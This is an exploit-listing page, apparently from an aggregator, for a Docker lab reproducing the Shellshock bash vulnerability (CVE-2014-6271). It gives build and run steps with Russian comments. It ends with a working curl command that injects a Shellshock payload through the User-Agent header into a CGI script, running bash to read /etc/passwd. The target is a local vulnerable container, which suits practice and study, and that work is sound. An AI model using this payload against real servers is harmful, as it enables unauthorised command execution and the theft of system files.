Exploit for docker_CVE-2014-6271.
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PILOU-PILOU-DOCKER_CVE-2014-6271.
# docker_CVE-2014-6271.
1. docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory
2. docker run -it -d -p 8080:80 DOCKERIMAGENAME
3. проверьте выполнение с помощью: docker ps
4. проверьте работу веб-сервера: http://localhost:8080
5. эксплуатируйте уязвимость : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \http://localhost:8080/cgi-bin/vulnerable